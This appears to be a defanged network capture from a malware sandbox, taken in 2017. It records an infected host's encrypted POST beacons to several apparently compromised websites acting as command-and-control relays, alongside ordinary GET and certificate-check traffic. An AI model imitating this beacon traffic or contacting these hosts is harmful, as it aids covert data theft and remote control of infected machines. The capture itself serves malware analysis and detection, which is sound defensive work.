form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.perc.ca
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Sat, 01 Jul 2017 11:17:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
ETag: 6666cd76f96956469e7be39d750cc7d9
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 15dd28c431c65d543ac0fe8bbfb902bb=np8j0m1bqrdtevblgq01iaq8o0; path=/
Last-Modified: Sat, 01 Jul 2017 11:17:12 GMT
Vary: Accept-Encoding
c599..<!DOCTYPE html>..<html dir="ltr" lang="en-gb">..<
head>.. <meta http-equiv="content-type" content="text/html;
charset=utf-8" />. <meta name="robots" content="index, follow"
/>. <meta name="keywords" content="Peace, Environment, PERC, P
EN, "Peace and Environment News", "Peace and Environmen
t", "Peace and Environment Resource Centre", "Peac
e and Environment Resource Center", "social justice", s
ustainability" />. <meta name="description" content="PERC - the
Ottawa Peace and Environment Resource Centre, home of the Peace and E
nvironment News (PEN)" />. <meta name="generator" content="Joom
la! 1.5 - Open Source Content Management" />. <title>PERC<
;/title>. <link href="/index.php?format=feed&type=rss" rel=
"alternate" type="application/rss xml" title="RSS 2.0" />. <lin
k href="/index.php?format=feed&type=atom" rel="alternate" type="ap
plication/atom xml" title="Atom 1.0" />. <link href="/favicon.i
co" rel="shortcut icon" type="image/x-icon" />. <link rel="styl
esheet" href="hXXp://VVV.perc.ca/modules/mod_hot_image_slider/tmpl/sty
le.css" type="text/css" />. <style type="text/css">. <
!--...div.wrap {.width:450px;.margin:0 auto;.text-align:left;.}..div#t
op div#nav {.float:left;.clear:both;.width:450px;.height:52px;.margin:
22px 0 0;.}..div#header_hotslider div.wrap {.height:430px;.background:
#ffffff;.}..div#header_hotslider div#slide-holder {.width:450px;.h

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: plus.ba
Connection: Keep-Alive
Cache-Control: no-cache

DhSd0frQGl7Qjsi9nSx5Gz30zTZqNNwgzuLluungaoCZ9n0UaBBPfSLvEvX9kiW/R6ZcdVPDICkRn20gz xHBbt5xsIk7kt3bCEMHMjVsj7qAioTF36D7/ydW9HrQZuoXOn7UTmp4jip48PU1ByxdQJSzaH/Rj5NDfFZYKrPpnuC1540SjaUJXHwCV8BUixW2fU7AXXieEZLjZlqUSCXsTgezBEaXjZe1mM7LAloZY4cMIOIJXB w7txglR/4Z3X3FwpQMW xjGG8eV0 2voLi ArnFGTqIZyqDCrQcyiqwx70eY97OBXbkhwYgc8SXZlOHQlQJhLpLLze/0386yyoe/4H9g50gwaMQpr8emUIEJjkwnbLOnLZK5r3vnLzcXe71k1gbHS6C/b3rxQ3/MtcknykBOZseLKT 2XTMGerdKh0YRNOzAD/dcOID3SMqm8bxZACU3GKYLZt2CV0sSvtH0zFQgR5/yACChkH9t8FNqyaL93voyONR4X 1QBm5UlV/nSIA=
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d4da4e94a0cbf2f6ed4d522673034e72a1498907798; expires=Sun, 01-Jul-18 11:16:38 GMT; path=/; domain=.plus.ba; HttpOnly
Location: hXXps://VVV.plus.ba/
Cache-Control: max-age=900
Expires: Sat, 01 Jul 2017 11:31:38 GMT
Server: cloudflare-nginx
CF-RAY: 3778f44b35908261-KBP
e4..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html&
gt;<head>.<title>301 Moved Permanently</title>.</
head><body>.<h1>Moved Permanently</h1>.<p>T
he document has moved <a href="hXXps://VVV.plus.ba/">here</a&
gt;.</p>.</body></html>...0..HTTP/1.1 301 Moved Perm
anently..Date: Sat, 01 Jul 2017 11:16:38 GMT..Content-Type: text/html;
charset=iso-8859-1..Transfer-Encoding: chunked..Connection: keep-aliv
e..Set-Cookie: __cfduid=d4da4e94a0cbf2f6ed4d522673034e72a1498907798; e
xpires=Sun, 01-Jul-18 11:16:38 GMT; path=/; domain=.plus.ba; HttpOnly.
.Location: hXXps://VVV.plus.ba/..Cache-Control: max-age=900..Expires:
Sat, 01 Jul 2017 11:31:38 GMT..Server: cloudflare-nginx..CF-RAY: 3778f
44b35908261-KBP..e4..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//
EN">.<html><head>.<title>301 Moved Permanently<
;/title>.</head><body>.<h1>Moved Permanently</
h1>.<p>The document has moved <a href="hXXps://VVV.plus.ba
/">here</a>.</p>.</body></html>...0..

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hostphd.com.br
Connection: Keep-Alive
Cache-Control: no-cache

3QAT8QSw2HC2aZyRH3v1fdfJfYI8 e/jeAVscjnWzWa45SQ7oIMO3CUMGIg/UnOPOFkY5zTfUtyLOoU1KKdoBEbL/66EzJ9m310UYGibTEuZ5yxsPC9U7RuxTTjORcUib YZTtQAdzXPAMrQIU6kLb8NPtwCvdijij0zHYRkyHWn1f9UtT4UFkZSQb/D8sX2L DvyMaWeEOVqC5pMJ9Emb88misk/YPUawQ1Nt8HfNP6zdlFMkcDeDPMO fRH7rowrn4e7QJRTyCab62mlhHNmZGJobc5PugbuQjHJznrO1JJSET9GduEF7NbjBnO4JTqEEHVrLOxCzDo1H90/7q0htpLoB qz/1BUExGcWBlCvp9TnXJ7PzK6R/L0H9/Qpa9RGWSWK9430STt3w0xcOOuUo0EHDZb/qcQEwv8pC8Js/1RT2QujWtOUguhfzw7AGpL2hhYIni3nXqCEVgv4WSrcMGe49D3zOMZ0j
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:00 GMT
Server: Apache
Last-Modified: Mon, 01 May 2017 01:23:55 GMT
Accept-Ranges: bytes
Content-Length: 51747
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!doctype html>.<!--[if IE 7 ]>    <html lang="en-gb" c
lass="isie ie7 oldie no-js"> <![endif]-->.<!--[if IE 8 ]&g
t; <html lang="en-gb" class="isie ie8 oldie no-js"> <![end
if]-->.<!--[if IE 9 ]> <html lang="en-gb" class="isie i
e9 no-js"> <![endif]-->.<!--[if (gt IE 9)|!(IE)]><!-
-> <html lang="en-gb" class="no-js"> <!--<![endif]-->
;..<head>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html;
charset=iso-8859-1">.<title>Hospedagem de Sites Ilimitada, R
evenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPH
D</title>.<meta http-equiv="Content-Language" content="pt-br"
/>.<meta name="TITLE" content="Hospedagem de Sites Ilimitada, R
evenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPH
D" />..<meta name="KEYWORDS" content="Hospedagem de Sites, Ilimi
tada, trafego ilimitado,Revenda de Hospedagem, Windows, Linux, Streami
ng, Vps, dedicados, dominios, patrocinios,construtor, revenda ilimitad
a, whmcs, construtor sites"/>..<meta name="DESCRIPTION" content=
"Hospedagem de Sites Ilimitada, trafego ilimitado,Revenda de Hospedage
m, Hospedagem de Sites Windows, Linux, Streaming, Vps, dedicados, domi
nios, patrocinios,construtor" />..<meta name="ABSTRACT" content=
"Hospedagem de Sites: Hospedagem de Sites, Planos de Revenda, Servidor
es Dedicados, Hospedagem de Sites Linux, Hospedagem de Sites Windows,
Planos de Revenda Linux, Planos de Revenda Windows, Revenda Window

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hostphd.com.br
Connection: Keep-Alive
Cache-Control: no-cache

MxeNbKCusXTVyLM785GoAtPyXb4IsqnZ1D/PQYkuE4hxQnc8BWgXocD07WIja69eVf60PNoiH1PEot2HaNyg3C3z1dtCWWk20rZDBD3a7uj6CjkPO35jcgKib7S1iaVAOsXEuv/laZi7CQmAcgLrCORluFKThdZsy8tcm8G9/m61GIExaXW aN4YiZ 10da/IbJDItFtbQv0JDf/fQJlFZbG2hGgHUcAbOyZAodY50KSIa4rOGR9YUOJRGgvEUgBrkm0W6NUtDK05v3Q6Smvst/FSFKGWHVlFqu6z5AmKZMH4c6JOaOyInvGwrUmp7HlSa7sSP XTkyWP2mY6ssnNjnJkB8QVq9/qJ854eUTmVmfCqwD/LLfxGsR5dpebJ3S5SohKr/VG7f/YcQxGj5sMwsf/IsXcHThXuWlD4pheNOAXW9mGqWaC/cNfcpBh2U8O5j5q2CNTsKCZMTMUBo5UVqzZRwUHtbupSw83Rp1WylZWUmCiRvH
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:04 GMT
Server: Apache
Last-Modified: Mon, 01 May 2017 01:23:55 GMT
Accept-Ranges: bytes
Content-Length: 51747
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
<!doctype html>.<!--[if IE 7 ]>    <html lang="en-gb" c
lass="isie ie7 oldie no-js"> <![endif]-->.<!--[if IE 8 ]&g
t; <html lang="en-gb" class="isie ie8 oldie no-js"> <![end
if]-->.<!--[if IE 9 ]> <html lang="en-gb" class="isie i
e9 no-js"> <![endif]-->.<!--[if (gt IE 9)|!(IE)]><!-
-> <html lang="en-gb" class="no-js"> <!--<![endif]-->
;..<head>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html;
charset=iso-8859-1">.<title>Hospedagem de Sites Ilimitada, R
evenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPH
D</title>.<meta http-equiv="Content-Language" content="pt-br"
/>.<meta name="TITLE" content="Hospedagem de Sites Ilimitada, R
evenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPH
D" />..<meta name="KEYWORDS" content="Hospedagem de Sites, Ilimi
tada, trafego ilimitado,Revenda de Hospedagem, Windows, Linux, Streami
ng, Vps, dedicados, dominios, patrocinios,construtor, revenda ilimitad
a, whmcs, construtor sites"/>..<meta name="DESCRIPTION" content=
"Hospedagem de Sites Ilimitada, trafego ilimitado,Revenda de Hospedage
m, Hospedagem de Sites Windows, Linux, Streaming, Vps, dedicados, domi
nios, patrocinios,construtor" />..<meta name="ABSTRACT" content=
"Hospedagem de Sites: Hospedagem de Sites, Planos de Revenda, Servidor
es Dedicados, Hospedagem de Sites Linux, Hospedagem de Sites Windows,
Planos de Revenda Linux, Planos de Revenda Windows, Revenda Window

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bigtopmultimedia.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:41 GMT
Server: Apache
X-Pingback: hXXp://bigtopmultimedia.net/xmlrpc.php
Link: <hXXp://bigtopmultimedia.net/wp-json/>; rel="hXXps://api.w.org/", <hXXp://bigtopmultimedia.net/>; rel=shortlink
Set-Cookie: wfvt_3454315397=595784a46db96; expires=Sat, 01-Jul-2017 11:46:52 GMT; path=/; httponly
Cache-Control: max-age=86400
Expires: Sun, 02 Jul 2017 11:16:41 GMT
Vary: Accept-Encoding
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
11084..<!DOCTYPE html>.<html class="no-js" lang="en-GB" prefi
x="og: hXXp://ogp.me/ns#" itemscope="itemscope" itemtype="hXXp://schem
a.org/WebPage">..<!-- head -->.<head>..<!-- meta --&
gt;.<meta charset="UTF-8" />.<meta name="viewport" content="w
idth=device-width, initial-scale=1, maximum-scale=1">.<title ite
mprop="name">Home - Big Top MultimediaBig Top Multimedia</title&
gt;...<link rel="shortcut icon" href="hXXp://bigtopmultimedia.net/w
p-content/uploads/2016/01/favicon.png" />..<link rel="apple-touc
h-icon" href="hXXp://bigtopmultimedia.net/wp-content/uploads/2016/01/a
pple-touch-icon.png" />....<!-- wp_head() -->.<!-- script
| dynamic -->.<script>.//<![CDATA[.window.mfn_ajax = "http
://bigtopmultimedia.net/wp-admin/admin-ajax.php";.window.mfn_nicescrol
l = 40;.window.mfn_parallax = "enllax";.window.mfn_prettyphoto = {styl
e:"pp_default", width:0, height:0};.window.mfn_sliders = {blog:0, clie
nts:0, offer:0, portfolio:0, shop:0, slider:0, testimonials:0};.window
.mfn_retina_disable = 0;.//]]>.</script>..<!-- This site i
s optimized with the Yoast SEO plugin v4.3 - hXXps://yoast.com/wordpre
ss/plugins/seo/ -->.<link rel="canonical" href="hXXp://bigtopmul
timedia.net/" />.<meta property="og:locale" content="en_GB" />
;.<meta property="og:type" content="website" />.<meta propert
y="og:title" content="Home - Big Top Multimedia" />.<meta proper
ty="og:description" content="CLICK HERE TO CONTACT US" />.<m

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: christybarry.com
Connection: Keep-Alive
Cache-Control: no-cache

aktFVuKd3F3KwnHRVQOdUmWZIV5yx9GUNgo3eWctIjuApV 2HPCkFBc Ebvq0EolE39Jq7tDd0nAHf8NX9ncSozR9v0vIQmBz9pRT2Ipk/I7TmmePV1rngLv06L8/DfT3fwv GrLDJbuqysr9WHCQiMV8qTeD5sqkFI3ed6xiRywQ/fRXLRpMTYXW0W/W79g4OWDJIlphAtnkYNYgI9SL8iAH4p zbuH66cjRF4uOI9JF/FGQqNyk/nhesdmKnasAwSpYX0nmuPCY7ZqeHpD xahdSWsrNAF47yGDIM6Q/ EMGwd 7l5sX1XsluNLrYf85VcU94eQOx0VZd2tGslbAGXrvQ4DJ2SgxUI5xeVCT794AFtG5K0OPb33kxkGIs3JT73ito4YLEhkZSlF9q8vf5slr9ixchjNhDUU700Aa4Z2MbDDhzLFXA0kETNlC5EfbsM9aGfAtoMjqgs7w==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:37 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Sat, 18 Sep 2010 13:47:59 GMT
ETag: "eb6984-2d34-49088ed5ba1c0"
Accept-Ranges: bytes
Content-Length: 11572
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="hXXp://w
ww.w3.org/1999/xhtml">..<head>...<title>Christy Barry&l
t;/title>...<meta name="Description" content="Christy Barry Iris
h Tradional Flute Player" />...<meta name="Keywords" content=""c
hristy barry, doolin, doolin county clare, county clare music, traditi
onal irish music, traditional irish flute, irish flute, co clare musi
c, co clare flute, irish folk music festivals, traditional irish music
bands, irish custom made flutes, traditional irish folk music festiva
l, doolin ceili band, tulla and kilfenora ceili bands, micho russell,
martin hayes, willie clancy, traditional irish folk music festival, cd
's, cds, dvd's, dvds, videos, books, music festivals celtic, ireland,
custy's music shop, bodhrón, concertinas, violins, fiddles, con
certinas, flutes, banjos,whistles,flute, traditional folk musicians, c
onnoisseurs, folk,instruments, ireland, in session videos"" />...&l
t;meta http-equiv="content-type" content="text/html; charset=utf-8" /&
gt;...<meta name="robots" content="all" />...<meta name="gene
rator" content="RapidWeaver" />............<link rel="stylesheet
" type="text/css" media="all" href="rw_common/themes/diamond/styles.cs
s" />...<link rel="stylesheet" type="text/css" media="print" hr
ef="rw_common/themes/diamond/print.css" />...<link rel="styleshe
et" type="text/css" media="screen" href="rw_common/themes/diamond/

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.usertrust.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:03 GMT
Server: Apache
Last-Modified: Wed, 28 Jun 2017 15:09:48 GMT
Expires: Wed, 05 Jul 2017 15:09:48 GMT
ETag: 5F9B5DA488D309EBB1DBE03CDD9E47314F426B3A
Cache-Control: max-age=358964,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp32
Content-Length: 471
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........z4.&...&T....$.T...2017062
8150948Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
.'f.V.I....p...."....20170628150948Z....20170705150948Z0...*.H........
......v....8.,v.rj{.d...j..Zi.*5.T....R....JB......f........\..R...:..
ueW6.@........{...c@. .i...jV_.z..mK=,\....Wb.zXe..6._...!g...}...~mQ#
..Q.....;..2{1...jj6:#..![..8b..5.k}....|.sl..b..oA^k....8U..q..".....
_.z.1B.....X.......P....RpN.[..:.=./.*....Y...QgzQ...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: egao.net
Connection: Keep-Alive
Cache-Control: no-cache

We4PAh7aKWFbaw 3afpkJQHt495efjy2MlSsne6y9mhXjLlHHo6xjKzVeJ0zsgnVRaIl3y0YYSiRUi69fIiGe/AJc30ojLtaDAswJtn/Vo85Uu2yCKWNhBnxyTymPPEwiAsi1yWcFym1L5kUw9peEfmrQd9xBKATE5rysQMOpKces0tJduYttIw  5wt1sb cVUDZq07sY3IDvaMjbn3/Mvn87fvnN6WugmAna3Fr2EP3glhDvrLWES4wuys5dqhGBKBDp/kxFbDqXVb9vXKpSgpe9kICWRQiRGoRCqqanBiHKd9aH cm3OAWFlFjgNrr3xuBQ6W/1raQg4RJ y2CdI4A/JYaOlBrsPffRCT/YHUppUP0swfug z6KCvr4PnblfQD6DsBvwD1H3cyc5uEofG7Mcf qIUMfBFAo5xAA==
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:16:42 GMT
Content-Type: text/html
Content-Length: 953
Connection: keep-alive
Last-Modified: Tue, 19 May 2015 02:13:36 GMT
ETag: "1d008fb-3b9-51665dbaf2d7c"
Accept-Ranges: bytes
X-Powered-By: PleskLin
<HTML>.<HEAD>.<TITLE>403 Forbidden</TITLE>.<
;/HEAD>.<BODY>.<H1>Forbidden</H1>.You do not have
permission to access this document..<P>.<HR>.<ADDRESS&
gt;.Web Server at egao.net.</ADDRESS>.</BODY>.</HTML>
;..<!--. - Unfortunately, Microsoft has added a clever new. - "
feature" to Internet Explorer. If the text of. - an error's message
is "too small", specifically. - less than 512 bytes, Internet Explor
er returns. - its own error message. You can turn that off,. - but
it's pretty tricky to find switch called. - "smart error messages".
That means, of course,. - that short error messages are censored by
default.. - IIS always returns error messages that are long. - en
ough to make Internet Explorer happy. The. - workaround is pretty si
mple: pad the error. - message with a big comment like this to push
it. - over the five hundred and twelve bytes minimum.. - Of course
, that's exactly what you're reading. - right now.. -->.HTTP/1.
1 403 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:16:42 GMT..C
ontent-Type: text/html..Content-Length: 953..Connection: keep-alive..L
ast-Modified: Tue, 19 May 2015 02:13:36 GMT..ETag: "1d008fb-3b9-51665d
baf2d7c"..Accept-Ranges: bytes..X-Powered-By: PleskLin..<HTML>.&
lt;HEAD>.<TITLE>403 Forbidden</TITLE>.</HEAD>.<
;BODY>.<H1>Forbidden</H1>.You do not have permission to
access this document..<P>.<HR>.<ADDRESS>.Web Se

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: egao.net
Connection: Keep-Alive
Cache-Control: no-cache

BeuWtaRSLXMZO3SvP32tNnelzmlcECxNGLq7oGweT sVWrXn MIl13ezRmOtyRU27A1Hf2 ktVad48a8H4 Cg6lGNIPB2Gh4iJmxdoVDOdCCOGzmepe/VvWUTySZGTfpSBejxsMfeoJYKq1dU8hosoa1V 1UuU89Iw2hwhOxQTRDRarwoybyir5VD/Sl9WPk09j6eUpmb5hxEwI3wiqLF7M0mgkCqWfmPZpf4mHynYJFe5nS2h0YkL/st8H/sy/D/soLeCc/hr88gWLDLJWqW2vzeZsUKy8/B3k652nADHfRn1rOSZeJAr/nOF4ue2w ntSfI3pk2r4Tye5iZl3cukjPdK60hFSZsODCOxz9 OwOd2gDJve7l4 xSA3yYAR1xTYOg2StlWRW7L2IOsclhTPk5/QEvHdivU9xHfIGOGUKU30Xnyc6GxojHCMHIJjXsVZbkRiOvY0 wszO9GJHCeMALNMxEYQ=
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:17:03 GMT
Content-Type: text/html
Content-Length: 953
Connection: keep-alive
Last-Modified: Tue, 19 May 2015 02:13:36 GMT
ETag: "1d008fb-3b9-51665dbaf2d7c"
Accept-Ranges: bytes
X-Powered-By: PleskLin
<HTML>.<HEAD>.<TITLE>403 Forbidden</TITLE>.<
;/HEAD>.<BODY>.<H1>Forbidden</H1>.You do not have
permission to access this document..<P>.<HR>.<ADDRESS&
gt;.Web Server at egao.net.</ADDRESS>.</BODY>.</HTML>
;..<!--. - Unfortunately, Microsoft has added a clever new. - "
feature" to Internet Explorer. If the text of. - an error's message
is "too small", specifically. - less than 512 bytes, Internet Explor
er returns. - its own error message. You can turn that off,. - but
it's pretty tricky to find switch called. - "smart error messages".
That means, of course,. - that short error messages are censored by
default.. - IIS always returns error messages that are long. - en
ough to make Internet Explorer happy. The. - workaround is pretty si
mple: pad the error. - message with a big comment like this to push
it. - over the five hundred and twelve bytes minimum.. - Of course
, that's exactly what you're reading. - right now.. -->.HTTP/1.
1 403 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:17:03 GMT..C
ontent-Type: text/html..Content-Length: 953..Connection: keep-alive..L
ast-Modified: Tue, 19 May 2015 02:13:36 GMT..ETag: "1d008fb-3b9-51665d
baf2d7c"..Accept-Ranges: bytes..X-Powered-By: PleskLin..<HTML>.&
lt;HEAD>.<TITLE>403 Forbidden</TITLE>.</HEAD>.<
;BODY>.<H1>Forbidden</H1>.You do not have permission to
access this document..<P>.<HR>.<ADDRESS>.Web Se

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: structives.org
Connection: Keep-Alive
Cache-Control: no-cache

U1yBq gsp2MDmXXDq6t4SlsskM/wQQPAnL7XV1EsMJfUa2j1VkBQyToCuydsaNXX5ZqpPZs ER40oNWW5KHdo549dYxc8d03Y0Iu9DQ7MTxxfDG0imWduHeC9jGyhxIQGCEr0zsZaVJiU9LHqbs9YTv8nFHa/zInpjzEU21ki0rtC5Zts VCMRWZQErU3yrethozKoph1v8I EUP1G7/xy4NyUr0pDg8DkM6jljandjd/aorGvj Ys/TjM8hGwN9M2LiWPK/PukFHKHzu/XX8aO35VrQgr8Q4IiQePzUrvMcSqsfSd2IivUFcmpH/LOiw3JtkZ3Z7WkNJLBlh87QLqbf77tG05SkYY6TIgJqGbnDN6LDP1IhQPuTbBkFLkmCqv97EolIKZX7f2x8uv47qY/NTtzUXt6Kber uYhkGqdh99epyRFXUC8Xa9UlFF/pBl3R6QVKhTdGbe15iuv3gaprv8ND/3ltJNBBYaWk ixpedgwI4Cv 6ZD0LMc1/0=
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Content-Length: 1564
Connection: keep-alive
Status: 404 Not Found
X-Request-Id: dc65ceff-1878-4ac5-96f3-9b1c1bacbb4f
X-Runtime: 0.001375
X-Powered-By: Phusion Passenger 4.0.53
Date: Sat, 01 Jul 2017 11:19:46 GMT
Server: nginx/1.6.2   Phusion Passenger 4.0.53
<!DOCTYPE html>.<html>.<head>.  <title>The pag
e you were looking for doesn't exist (404)</title>. <meta na
me="viewport" content="width=device-width,initial-scale=1">. <s
tyle>. body {. background-color: #EFEFEF;. color: #2E2F30;.
text-align: center;. font-family: arial, sans-serif;. margin:
0;. }.. div.dialog {. width: 95%;. max-width: 33em;. margi
n: 4em auto 0;. }.. div.dialog > div {. border: 1px solid #CCC
;. border-right-color: #999;. border-left-color: #999;. borde
r-bottom-color: #BBB;. border-top: #B00100 solid 4px;. border-to
p-left-radius: 9px;. border-top-right-radius: 9px;. background-c
olor: white;. padding: 7px 12% 0;. box-shadow: 0 3px 8px rgba(50
, 50, 50, 0.17);. }.. h1 {. font-size: 100%;. color: #730E15;.
line-height: 1.5em;. }.. div.dialog > p {. margin: 0 0 1em
;. padding: 1em;. background-color: #F7F7F7;. border: 1px sol
id #CCC;. border-right-color: #999;. border-left-color: #999;.
border-bottom-color: #999;. border-bottom-left-radius: 4px;. b
order-bottom-right-radius: 4px;. border-top-color: #DADADA;. col
or: #666;. box-shadow: 0 3px 8px rgba(50, 50, 50, 0.17);. }. <
/style>.</head>..<body>. <!-- This file lives in pu
blic/404.html -->. <div class="dialog">. <div>.
<h1>The page you were looking for doesn't exist.</h1>.
<p>You may have mistyped the address or the page may hav

<<< skipped >>>

GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSTufqHinruS/P9Wi1XSjRRzoTLfAQUfgNaZUFrp34K4bidCOodjh1qx2UCEQDz2s8xoGAsSX7X4SgWqX81 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.comodoca.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:15 GMT
Server: Apache
Last-Modified: Fri, 30 Jun 2017 07:26:47 GMT
Expires: Fri, 07 Jul 2017 07:26:47 GMT
ETag: 3EB3DD7C78B7E47A470A9C90C0EBA44EAD59F834
Cache-Control: max-age=503971,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp32
Content-Length: 472
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......~.ZeAk.~.........j.e..2017063
0072647Z0t0r0J0... .............z.K..Z-WJ4Q...|..~.ZeAk.~.........j.e.
.....1.`,I~..(...5....20170630072647Z....20170707072647Z0...*.H.......
......k[f.p6..`..3.$.Qm.......r.t..o.....lLg .`x.........0.*......qf.F
..\.G&.@..s....Jn.O8..o../B..;.Cg..o.U)mI.y..z...J.2...a..2.G. ...'..2
..9.B.2K%....F.t.LK.D...,Ru4{9sLg.........6...,....a...5i..\..../.\...
..O..~].....a..Q.T...w...z.`P.aD .e....H..>..}.!@.....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 476
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: churchclothes.com
Connection: Keep-Alive
Cache-Control: no-cache

2qLpeXoK nyoP8pTHRc4O73p1OTqu4e2Tvy3Ubq x5USudtrNbkus5Dzak2UU2rwcc9sGDVo7a4uKMhJNrE5RbBj0rnzP3JrQs6ct053e8bpMmQX8izQuCaImurTOonqph/yZl30Zocpo1CaSm6IxKDj38UsSUnuZ84UY0RnZG  HW8QUBbpZRlrWYXlDW1v6Qks42MYrt5SYci7zHfgzF1slcZ ESujy8SwZgRkM0/0EgSVc1RvE4hQPfwgnhSVVS/3V3CpZ7VlHeVrsPFE UiZeFLCHw 3/DQvCr0DfjhyQvqFnqmpDze95VBDOmzMUYSkyLV2Ebu5xCvLj6fMke/bbo l12pXAM6q2nhP7auBZHgMRNcitbgbDdsrBfCXxtWsR/lwQBCakfet eMOMaL5IdH2ak0SDmI/RqciX5dlSVxBmn9p4SayLw68z2XoLYMalTLjYhoHTgeoKgRBGZK0C/U=
HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 01 Jul 2017 11:17:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 13
X-Sorting-Hat-PodId-Cached: 1
X-Sorting-Hat-ShopId: 6604951
X-Sorting-Hat-Section: pod
X-Sorting-Hat-ShopId-Cached: 1
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 13
X-Sorting-Hat-PodId-Cached: 1
X-Sorting-Hat-ShopId: 6604951
X-Sorting-Hat-Section: pod
X-Sorting-Hat-ShopId-Cached: 1
Vary: Accept-Encoding
X-ShopId: 6604951
X-ShardId: 13
Content-Language: en
Cache-Control: no-cache, no-store
Set-Cookie: cart_sig=; path=/; expires=Sat, 15 Jul 2017 11:17:14 -0000; HttpOnly
X-Content-Type-Options: nosniff
X-Download-Options: noopen
